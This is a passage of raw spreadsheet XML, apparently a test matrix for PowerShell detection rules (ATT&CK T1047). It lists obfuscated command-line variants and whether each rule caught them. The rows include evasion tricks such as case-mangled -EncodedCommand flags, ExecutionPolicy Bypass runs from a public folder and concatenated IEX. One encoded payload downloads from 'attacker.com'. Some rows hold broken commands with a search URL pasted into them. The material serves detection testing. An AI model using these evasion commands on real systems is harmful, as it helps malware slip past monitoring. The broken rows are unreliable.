          <t>1816994b-42e1-4fb1-afd2-134d88184f71</t>
        </is>
      </c>
      <c r="E4257" s="43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4257" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G4257" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H4257" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I4257" s="43" t="inlineStr">
        <is>
          <t>Base64 Encoded PowerShell Command Detected (e32d4572-9826-4738-b651-95fa63747e8a); Base64 Encoded PowerShell Command Detected (e32d4572-9826-4738-b651-95fa63747e8a)</t>
        </is>
      </c>
      <c r="J4257" s="43" t="n"/>
      <c r="K4257" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4258" ht="15.75" customHeight="1" s="42">
      <c r="A4258" s="43" t="inlineStr">
        <is>
          <t>t1047</t>
        </is>
      </c>
      <c r="B4258" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_wmi_classes</t>
        </is>
      </c>
      <c r="C4258" s="43" t="inlineStr">
        <is>
          <t>PowerShell Base64 Encoded WMI Classes</t>
        </is>
      </c>
      <c r="D4258" s="43" t="inlineStr">
        <is>
          <t>1816994b-42e1-4fb1-afd2-134d88184f71</t>
        </is>
      </c>
      <c r="E4258" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -"Command" "Get-WmiObject -Class ([char[]](https://www.google.com/search?q=87,105,110,51,50,95,80,114,111,99,101,115,115) -join '')"</t>
        </is>
      </c>
      <c r="F4258" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G4258" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H4258" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I4258" s="43" t="inlineStr">
        <is>
          <t>Potential Encoded PowerShell Patterns In CommandLine (cdf05894-89e7-4ead-b2b0-0a5f97a90f2f)</t>
        </is>
      </c>
      <c r="J4258" s="43" t="n"/>
      <c r="K4258" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4259" ht="15.75" customHeight="1" s="42">
      <c r="A4259" s="43" t="inlineStr">
        <is>
          <t>t1047</t>
        </is>
      </c>
      <c r="B4259" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_wmi_classes</t>
        </is>
      </c>
      <c r="C4259" s="43" t="inlineStr">
        <is>
          <t>PowerShell Base64 Encoded WMI Classes</t>
        </is>
      </c>
      <c r="D4259" s="43" t="inlineStr">
        <is>
          <t>1816994b-42e1-4fb1-afd2-134d88184f71</t>
        </is>
      </c>
      <c r="E4259" s="43" t="inlineStr">
        <is>
          <t>powershell.exe /"Command" "Get-WmiObject -Class ([char[]](https://www.google.com/search?q=87,105,110,51,50,95,80,114,111,99,101,115,115) -join '')"</t>
        </is>
      </c>
      <c r="F4259" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G4259" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H4259" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I4259" s="43" t="inlineStr">
        <is>
          <t>Potential Encoded PowerShell Patterns In CommandLine (cdf05894-89e7-4ead-b2b0-0a5f97a90f2f)</t>
        </is>
      </c>
      <c r="J4259" s="43" t="n"/>
      <c r="K4259" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4260" ht="15.75" customHeight="1" s="42">
      <c r="A4260" s="43" t="inlineStr">
        <is>
          <t>t1047</t>
        </is>
      </c>
      <c r="B4260" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_wmi_classes</t>
        </is>
      </c>
      <c r="C4260" s="43" t="inlineStr">
        <is>
          <t>PowerShell Base64 Encoded WMI Classes</t>
        </is>
      </c>
      <c r="D4260" s="43" t="inlineStr">
        <is>
          <t>1816994b-42e1-4fb1-afd2-134d88184f71</t>
        </is>
      </c>
      <c r="E4260" s="43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4260" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G4260" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H4260" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I4260" s="43" t="n"/>
      <c r="J4260" s="43" t="n"/>
      <c r="K4260" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="4261" ht="15.75" customHeight="1" s="42">
      <c r="A4261" s="43" t="inlineStr">
        <is>
          <t>t1047</t>
        </is>
      </c>
      <c r="B4261" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_wmi_classes</t>
        </is>
      </c>
      <c r="C4261" s="43" t="inlineStr">
        <is>
          <t>PowerShell Base64 Encoded WMI Classes</t>
        </is>
      </c>
      <c r="D4261" s="43" t="inlineStr">
        <is>
          <t>1816994b-42e1-4fb1-afd2-134d88184f71</t>
        </is>
      </c>
      <c r="E4261" s="43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4261" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G4261" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H4261" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I4261" s="43" t="n"/>
      <c r="J4261" s="43" t="n"/>
      <c r="K4261" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="4262" ht="15.75" customHeight="1" s="42">
      <c r="A4262" s="43" t="inlineStr">
        <is>
          <t>t1047</t>
        </is>
      </c>
      <c r="B4262" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_wmi_classes</t>
        </is>
      </c>
      <c r="C4262" s="43" t="inlineStr">
        <is>
          <t>PowerShell Base64 Encoded WMI Classes</t>
        </is>
      </c>
      <c r="D4262" s="43" t="inlineStr">
        <is>
          <t>1816994b-42e1-4fb1-afd2-134d88184f71</t>
        </is>
      </c>
      <c r="E4262" s="43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4262" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G4262" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H4262" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I4262" s="43" t="n"/>
      <c r="J4262" s="43" t="n"/>
      <c r="K4262" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="4263" ht="15.75" customHeight="1" s="42">
      <c r="A4263" s="43" t="inlineStr">
        <is>
          <t>t1047</t>
        </is>
      </c>
      <c r="B4263" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_wmi_classes</t>
        </is>
      </c>
      <c r="C4263" s="43" t="inlineStr">
        <is>
          <t>PowerShell Base64 Encoded WMI Classes</t>
        </is>
      </c>
      <c r="D4263" s="43" t="inlineStr">
        <is>
          <t>1816994b-42e1-4fb1-afd2-134d88184f71</t>
        </is>
      </c>
      <c r="E4263" s="43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F4263" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G4263" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H4263" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I4263" s="43" t="n"/>
      <c r="J4263" s="43" t="n"/>
      <c r="K4263" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="4264" ht="15.75" customHeight="1" s="42">
      <c r="A4264" s="43" t="inlineStr">
        <is>
          <t>t1047</t>
        </is>
      </c>
      <c r="B4264" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_wmi_classes</t>
        </is>
      </c>
      <c r="C4264" s="43" t="inlineStr">
        <is>
          <t>PowerShell Base64 Encoded WMI Classes</t>
        </is>
      </c>
      <c r="D4264" s="43" t="inlineStr">
        <is>
          <t>1816994b-42e1-4fb1-afd2-134d88184f71</t>
        </is>
      </c>
      <c r="E4264" s="43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F4264" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G4264" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H4264" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I4264" s="43" t="n"/>
      <c r="J4264" s="43" t="n"/>
      <c r="K4264" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="4265" ht="15.75" customHeight="1" s="42">
      <c r="A4265" s="43" t="inlineStr">
        <is>
          <t>t1047</t>
        </is>
      </c>
      <c r="B4265" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_cmdline_convertto_securestring</t>
        </is>
      </c>
      <c r="C4265" s="43" t="inlineStr">
        <is>
          <t>ConvertTo-SecureString Cmdlet Usage Via CommandLine</t>
        </is>
      </c>
      <c r="D4265" s="43" t="inlineStr">
        <is>
          <t>74403157-20f5-415d-89a7-c505779585cf</t>
        </is>
      </c>
      <c r="E4265" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -EncodedCommand Q29udmVydFRvLVNlY3VyZVN0cmluZyAtU3RyaW5nICdQYXNzd29yZCcgLUFzUGxhaW5UZXh0IC1Gb3JjZQ==</t>
        </is>
      </c>
      <c r="F4265" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G4265" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H4265" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I4265" s="43" t="inlineStr">
        <is>
          <t>Suspicious Execution of Powershell with Base64 (fb843269-508c-4b76-8b8d-88679db22ce7)</t>
        </is>
      </c>
      <c r="J4265" s="43" t="n"/>
      <c r="K4265" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4266" ht="15.75" customHeight="1" s="42">
      <c r="A4266" s="43" t="inlineStr">
        <is>
          <t>t1047</t>
        </is>
      </c>
      <c r="B4266" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_cmdline_convertto_securestring</t>
        </is>
      </c>
      <c r="C4266" s="43" t="inlineStr">
        <is>
          <t>ConvertTo-SecureString Cmdlet Usage Via CommandLine</t>
        </is>
      </c>
      <c r="D4266" s="43" t="inlineStr">
        <is>
          <t>74403157-20f5-415d-89a7-c505779585cf</t>
        </is>
      </c>
      <c r="E4266" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -"EncodedCommand" Q29udmVydFRvLVNlY3VyZVN0cmluZyAtU3RyaW5nICdQYXNzd29yZCcgLUFzUGxhaW5UZXh0IC1Gb3JjZQ==</t>
        </is>
      </c>
      <c r="F4266" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G4266" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H4266" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I4266" s="43" t="n"/>
      <c r="J4266" s="43" t="n"/>
      <c r="K4266" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="4267" ht="15.75" customHeight="1" s="42">
      <c r="A4267" s="43" t="inlineStr">
        <is>
          <t>t1047</t>
        </is>
      </c>
      <c r="B4267" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_cmdline_convertto_securestring</t>
        </is>
      </c>
      <c r="C4267" s="43" t="inlineStr">
        <is>
          <t>ConvertTo-SecureString Cmdlet Usage Via CommandLine</t>
        </is>
      </c>
      <c r="D4267" s="43" t="inlineStr">
        <is>
          <t>74403157-20f5-415d-89a7-c505779585cf</t>
        </is>
      </c>
      <c r="E4267" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -EncODEDCommand Q29udmVydFRvLVNlY3VyZVN0cmluZyAtU3RyaW5nICdQYXNzd29yZCcgLUFzUGxhaW5UZXh0IC1Gb3JjZQ==</t>
        </is>
      </c>
      <c r="F4267" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G4267" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H4267" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I4267" s="43" t="inlineStr">
        <is>
          <t>Suspicious Execution of Powershell with Base64 (fb843269-508c-4b76-8b8d-88679db22ce7)</t>
        </is>
      </c>
      <c r="J4267" s="43" t="n"/>
      <c r="K4267" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4268" ht="15.75" customHeight="1" s="42">
      <c r="A4268" s="43" t="inlineStr">
        <is>
          <t>t1047</t>
        </is>
      </c>
      <c r="B4268" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_cmdline_convertto_securestring</t>
        </is>
      </c>
      <c r="C4268" s="43" t="inlineStr">
        <is>
          <t>ConvertTo-SecureString Cmdlet Usage Via CommandLine</t>
        </is>
      </c>
      <c r="D4268" s="43" t="inlineStr">
        <is>
          <t>74403157-20f5-415d-89a7-c505779585cf</t>
        </is>
      </c>
      <c r="E4268" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -eNcodEDCOmManD Q29udmVydFRvLVNlY3VyZVN0cmluZyAtU3RyaW5nICdQYXNzd29yZCcgLUFzUGxhaW5UZXh0IC1Gb3JjZQ==</t>
        </is>
      </c>
      <c r="F4268" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G4268" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H4268" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I4268" s="43" t="inlineStr">
        <is>
          <t>Suspicious Execution of Powershell with Base64 (fb843269-508c-4b76-8b8d-88679db22ce7)</t>
        </is>
      </c>
      <c r="J4268" s="43" t="n"/>
      <c r="K4268" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4269" ht="15.75" customHeight="1" s="42">
      <c r="A4269" s="43" t="inlineStr">
        <is>
          <t>t1047</t>
        </is>
      </c>
      <c r="B4269" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_cmdline_convertto_securestring</t>
        </is>
      </c>
      <c r="C4269" s="43" t="inlineStr">
        <is>
          <t>ConvertTo-SecureString Cmdlet Usage Via CommandLine</t>
        </is>
      </c>
      <c r="D4269" s="43" t="inlineStr">
        <is>
          <t>74403157-20f5-415d-89a7-c505779585cf</t>
        </is>
      </c>
      <c r="E4269" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -enc Q29udmVydFRvLVNlY3VyZVN0cmluZyAtU3RyaW5nICdQYXNzd29yZCcgLUFzUGxhaW5UZXh0IC1Gb3JjZQ==</t>
        </is>
      </c>
      <c r="F4269" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G4269" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H4269" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I4269" s="43" t="inlineStr">
        <is>
          <t>Suspicious Execution of Powershell with Base64 (fb843269-508c-4b76-8b8d-88679db22ce7)</t>
        </is>
      </c>
      <c r="J4269" s="43" t="n"/>
      <c r="K4269" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4270" ht="15.75" customHeight="1" s="42">
      <c r="A4270" s="43" t="inlineStr">
        <is>
          <t>t1047</t>
        </is>
      </c>
      <c r="B4270" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_cmdline_convertto_securestring</t>
        </is>
      </c>
      <c r="C4270" s="43" t="inlineStr">
        <is>
          <t>ConvertTo-SecureString Cmdlet Usage Via CommandLine</t>
        </is>
      </c>
      <c r="D4270" s="43" t="inlineStr">
        <is>
          <t>74403157-20f5-415d-89a7-c505779585cf</t>
        </is>
      </c>
      <c r="E4270" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -ENcoDedcomMaND Q29udmVydFRvLVNlY3VyZVN0cmluZyAtU3RyaW5nICdQYXNzd29yZCcgLUFzUGxhaW5UZXh0IC1Gb3JjZQ==</t>
        </is>
      </c>
      <c r="F4270" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G4270" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H4270" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I4270" s="43" t="inlineStr">
        <is>
          <t>Suspicious Execution of Powershell with Base64 (fb843269-508c-4b76-8b8d-88679db22ce7)</t>
        </is>
      </c>
      <c r="J4270" s="43" t="n"/>
      <c r="K4270" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4271" ht="15.75" customHeight="1" s="42">
      <c r="A4271" s="43" t="inlineStr">
        <is>
          <t>t1047</t>
        </is>
      </c>
      <c r="B4271" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_cmdline_convertto_securestring</t>
        </is>
      </c>
      <c r="C4271" s="43" t="inlineStr">
        <is>
          <t>ConvertTo-SecureString Cmdlet Usage Via CommandLine</t>
        </is>
      </c>
      <c r="D4271" s="43" t="inlineStr">
        <is>
          <t>74403157-20f5-415d-89a7-c505779585cf</t>
        </is>
      </c>
      <c r="E4271" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -enCOdEDCOMMaNd Q29udmVydFRvLVNlY3VyZVN0cmluZyAtU3RyaW5nICdQYXNzd29yZCcgLUFzUGxhaW5UZXh0IC1Gb3JjZQ==</t>
        </is>
      </c>
      <c r="F4271" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G4271" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H4271" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I4271" s="43" t="inlineStr">
        <is>
          <t>Suspicious Execution of Powershell with Base64 (fb843269-508c-4b76-8b8d-88679db22ce7)</t>
        </is>
      </c>
      <c r="J4271" s="43" t="n"/>
      <c r="K4271" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4272" ht="15.75" customHeight="1" s="42">
      <c r="A4272" s="43" t="inlineStr">
        <is>
          <t>t1047</t>
        </is>
      </c>
      <c r="B4272" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_cmdline_convertto_securestring</t>
        </is>
      </c>
      <c r="C4272" s="43" t="inlineStr">
        <is>
          <t>ConvertTo-SecureString Cmdlet Usage Via CommandLine</t>
        </is>
      </c>
      <c r="D4272" s="43" t="inlineStr">
        <is>
          <t>74403157-20f5-415d-89a7-c505779585cf</t>
        </is>
      </c>
      <c r="E4272" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -"Command" "$a='ConvertTo-'; $b='SecureString'; $c=$a+$b; &amp;$c -String 'MySecret' -AsPlainText -Force"</t>
        </is>
      </c>
      <c r="F4272" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G4272" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H4272" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I4272" s="43" t="n"/>
      <c r="J4272" s="43" t="n"/>
      <c r="K4272" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4273" ht="15.75" customHeight="1" s="42">
      <c r="A4273" s="43" t="inlineStr">
        <is>
          <t>t1047</t>
        </is>
      </c>
      <c r="B4273" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_cmdline_convertto_securestring</t>
        </is>
      </c>
      <c r="C4273" s="43" t="inlineStr">
        <is>
          <t>ConvertTo-SecureString Cmdlet Usage Via CommandLine</t>
        </is>
      </c>
      <c r="D4273" s="43" t="inlineStr">
        <is>
          <t>74403157-20f5-415d-89a7-c505779585cf</t>
        </is>
      </c>
      <c r="E4273" s="43" t="inlineStr">
        <is>
          <t>powershell.exe /"Command" "$a='ConvertTo-'; $b='SecureString'; $c=$a+$b; &amp;$c -String 'MySecret' -AsPlainText -Force"</t>
        </is>
      </c>
      <c r="F4273" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G4273" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H4273" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I4273" s="43" t="n"/>
      <c r="J4273" s="43" t="n"/>
      <c r="K4273" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="4274" ht="15.75" customHeight="1" s="42">
      <c r="A4274" s="43" t="inlineStr">
        <is>
          <t>t1047</t>
        </is>
      </c>
      <c r="B4274" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_cmdline_reversed_strings</t>
        </is>
      </c>
      <c r="C4274" s="43" t="inlineStr">
        <is>
          <t>Potential PowerShell Obfuscation Via Reversed Commands</t>
        </is>
      </c>
      <c r="D4274" s="43" t="inlineStr">
        <is>
          <t>b6b49cd1-34d6-4ead-b1bf-176e9edba9a4</t>
        </is>
      </c>
      <c r="E4274" s="43" t="inlineStr">
        <is>
          <t>powershell.exe /"EncodedCommand" SQBuAHYAbwBrAGUALQBXAGUAYgBSAGUAcQB1AGUAcwB0ACAAIgBoAHQAdABwADoALwAvAGEAdAB0AGEAYwBrAGUAcgAuAGMAbwBtAC8AcABhAHkAbABvAGEAZAAiAA==</t>
        </is>
      </c>
      <c r="F4274" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G4274" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H4274" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I4274" s="43" t="n"/>
      <c r="J4274" s="43" t="n"/>
      <c r="K4274" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="4275" ht="15.75" customHeight="1" s="42">
      <c r="A4275" s="43" t="inlineStr">
        <is>
          <t>t1047</t>
        </is>
      </c>
      <c r="B4275" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_cmdline_reversed_strings</t>
        </is>
      </c>
      <c r="C4275" s="43" t="inlineStr">
        <is>
          <t>Potential PowerShell Obfuscation Via Reversed Commands</t>
        </is>
      </c>
      <c r="D4275" s="43" t="inlineStr">
        <is>
          <t>b6b49cd1-34d6-4ead-b1bf-176e9edba9a4</t>
        </is>
      </c>
      <c r="E4275" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -"EncodedCommand" SQBuAHYAbwBrAGUALQBXAGUAYgBSAGUAcQB1AGUAcwB0ACAAIgBoAHQAdABwADoALwAvAGEAdAB0AGEAYwBrAGUAcgAuAGMAbwBtAC8AcABhAHkAbABvAGEAZAAiAA==</t>
        </is>
      </c>
      <c r="F4275" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G4275" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H4275" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I4275" s="43" t="n"/>
      <c r="J4275" s="43" t="n"/>
      <c r="K4275" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="4276" ht="15.75" customHeight="1" s="42">
      <c r="A4276" s="43" t="inlineStr">
        <is>
          <t>t1047</t>
        </is>
      </c>
      <c r="B4276" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_cmdline_reversed_strings</t>
        </is>
      </c>
      <c r="C4276" s="43" t="inlineStr">
        <is>
          <t>Potential PowerShell Obfuscation Via Reversed Commands</t>
        </is>
      </c>
      <c r="D4276" s="43" t="inlineStr">
        <is>
          <t>b6b49cd1-34d6-4ead-b1bf-176e9edba9a4</t>
        </is>
      </c>
      <c r="E4276" s="43" t="inlineStr">
        <is>
          <t>powershell.exe /"ExecutionPolicy" Bypass -FilE C:\Users\Public\script.ps1</t>
        </is>
      </c>
      <c r="F4276" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G4276" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H4276" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I4276" s="43" t="inlineStr">
        <is>
          <t>Execution of Powershell Script in Public Folder (fb9d3ff7-7348-46ab-af8c-b55f5fbf39b4)</t>
        </is>
      </c>
      <c r="J4276" s="43" t="n"/>
      <c r="K4276" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4277" ht="15.75" customHeight="1" s="42">
      <c r="A4277" s="43" t="inlineStr">
        <is>
          <t>t1047</t>
        </is>
      </c>
      <c r="B4277" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_cmdline_reversed_strings</t>
        </is>
      </c>
      <c r="C4277" s="43" t="inlineStr">
        <is>
          <t>Potential PowerShell Obfuscation Via Reversed Commands</t>
        </is>
      </c>
      <c r="D4277" s="43" t="inlineStr">
        <is>
          <t>b6b49cd1-34d6-4ead-b1bf-176e9edba9a4</t>
        </is>
      </c>
      <c r="E4277" s="43" t="inlineStr">
        <is>
          <t>powershell.exe /"ExecutionPolicy" Bypass -f C:\Users\Public\script.ps1</t>
        </is>
      </c>
      <c r="F4277" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G4277" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H4277" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I4277" s="43" t="inlineStr">
        <is>
          <t>Execution of Powershell Script in Public Folder (fb9d3ff7-7348-46ab-af8c-b55f5fbf39b4)</t>
        </is>
      </c>
      <c r="J4277" s="43" t="n"/>
      <c r="K4277" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4278" ht="15.75" customHeight="1" s="42">
      <c r="A4278" s="43" t="inlineStr">
        <is>
          <t>t1047</t>
        </is>
      </c>
      <c r="B4278" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_cmdline_reversed_strings</t>
        </is>
      </c>
      <c r="C4278" s="43" t="inlineStr">
        <is>
          <t>Potential PowerShell Obfuscation Via Reversed Commands</t>
        </is>
      </c>
      <c r="D4278" s="43" t="inlineStr">
        <is>
          <t>b6b49cd1-34d6-4ead-b1bf-176e9edba9a4</t>
        </is>
      </c>
      <c r="E4278" s="43" t="inlineStr">
        <is>
          <t>powershell.exe /"ExecutionPolicy" Bypass -FiLe C:\Users\Public\script.ps1</t>
        </is>
      </c>
      <c r="F4278" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G4278" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H4278" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I4278" s="43" t="inlineStr">
        <is>
          <t>Execution of Powershell Script in Public Folder (fb9d3ff7-7348-46ab-af8c-b55f5fbf39b4)</t>
        </is>
      </c>
      <c r="J4278" s="43" t="n"/>
      <c r="K4278" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4279" ht="15.75" customHeight="1" s="42">
      <c r="A4279" s="43" t="inlineStr">
        <is>
          <t>t1047</t>
        </is>
      </c>
      <c r="B4279" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_cmdline_reversed_strings</t>
        </is>
      </c>
      <c r="C4279" s="43" t="inlineStr">
        <is>
          <t>Potential PowerShell Obfuscation Via Reversed Commands</t>
        </is>
      </c>
      <c r="D4279" s="43" t="inlineStr">
        <is>
          <t>b6b49cd1-34d6-4ead-b1bf-176e9edba9a4</t>
        </is>
      </c>
      <c r="E4279" s="43" t="inlineStr">
        <is>
          <t>powershell.exe /"ExecutionPolicy" Bypass -fiLE C:\Users\Public\script.ps1</t>
        </is>
      </c>
      <c r="F4279" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G4279" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H4279" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I4279" s="43" t="inlineStr">
        <is>
          <t>Execution of Powershell Script in Public Folder (fb9d3ff7-7348-46ab-af8c-b55f5fbf39b4)</t>
        </is>
      </c>
      <c r="J4279" s="43" t="n"/>
      <c r="K4279" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4280" ht="15.75" customHeight="1" s="42">
      <c r="A4280" s="43" t="inlineStr">
        <is>
          <t>t1047</t>
        </is>
      </c>
      <c r="B4280" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_cmdline_special_characters</t>
        </is>
      </c>
      <c r="C4280" s="43" t="inlineStr">
        <is>
          <t>Potential PowerShell Command Line Obfuscation</t>
        </is>
      </c>
      <c r="D4280" s="43" t="inlineStr">
        <is>
          <t>d7bcd677-645d-4691-a8d4-7a5602b780d1</t>
        </is>
      </c>
      <c r="E4280" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -ep Bypass /"File" C:\Users\Public\script.ps1</t>
        </is>
      </c>
      <c r="F4280" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G4280" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H4280" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I4280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4280" s="43" t="n"/>
      <c r="K4280" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4281" ht="15.75" customHeight="1" s="42">
      <c r="A4281" s="43" t="inlineStr">
        <is>
          <t>t1047</t>
        </is>
      </c>
      <c r="B4281" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_cmdline_special_characters</t>
        </is>
      </c>
      <c r="C4281" s="43" t="inlineStr">
        <is>
          <t>Potential PowerShell Command Line Obfuscation</t>
        </is>
      </c>
      <c r="D4281" s="43" t="inlineStr">
        <is>
          <t>d7bcd677-645d-4691-a8d4-7a5602b780d1</t>
        </is>
      </c>
      <c r="E4281" s="43" t="inlineStr">
        <is>
          <t>powershell.exe /"Command" "&amp; ( '{0}{1}{2}' -f 'I','EX','' ) ('Wri'+'te-H'+'ost ''Bypass''')"</t>
        </is>
      </c>
      <c r="F4281" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G4281" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H4281" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I4281" s="43" t="n"/>
      <c r="J4281" s="43" t="n"/>
      <c r="K4281" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="4282" ht="15.75" customHeight="1" s="42">
      <c r="A4282" s="43" t="inlineStr">
        <is>
          <t>t1047</t>
        </is>
      </c>
      <c r="B4282" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_comobject_msi</t>
        </is>
      </c>
      <c r="C4282" s="43" t="inlineStr">
        <is>
          <t>Obfuscated PowerShell MSI Install via WindowsInstaller COM</t>
        </is>
      </c>
      <c r="D4282" s="43" t="inlineStr">
        <is>
          <t>7b6a7418-3afc-11f0-aff4-000d3abf478c</t>
        </is>
      </c>
      <c r="E4282" s="43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4282" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G4282" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H4282" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I4282" s="43" t="n"/>
      <c r="J4282" s="43" t="n"/>
      <c r="K4282" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="4283" ht="15.75" customHeight="1" s="42">
      <c r="A4283" s="43" t="inlineStr">
        <is>
          <t>t1047</t>
        </is>
      </c>
      <c r="B4283" s="43" t="inlineStr">
        <is>
